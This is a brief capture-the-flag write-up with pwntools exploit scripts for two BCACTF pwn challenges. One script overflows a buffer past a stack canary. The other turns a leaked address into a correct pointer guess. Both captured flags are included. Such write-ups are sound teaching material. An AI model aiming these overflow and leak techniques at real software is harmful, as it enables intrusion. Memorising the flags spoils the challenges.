Canary keeper
Easy pwn:
#!/usr/bin/python3
from pwn import *
gs = '''
b main
continue
'''
elf = context.binary = ELF('./provided')
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
if args.GDB:
return gdb.debug('./provided', gdbscript=gs)
if args.REMOTE:
return remote('challs.bcactf.com', 32101)
else:
return process('./provided')
r = start()
#========= exploit here ===================
payload = b"A"*73
payload += b"canary\0"
payload += b"DDDD\0"
payload += b"D"*50
r.sendline(payload)
#========= interactive ====================
r.interactive()
#bcactf{s1mple_CANaRY_9b36bd9f3fd2f}
Pwnage
Another simple pwn:
#!/usr/bin/python3
from pwn import *
r = remote('challs.bcactf.com', 30810)
r.recvuntil(b'in is ')
leak = int(r.recvline().strip(), 16)
log.info(f"leak {hex(leak)}")
pointer = hex(leak+0x20).encode('ascii')
print(pointer)
r.sendlineafter(b"guess>", pointer)
r.interactive()
#bcactf{0nE_two_thR3E_f0ur_567___sT3ps_t0_PwN4G3_70cc0e5edd6ea}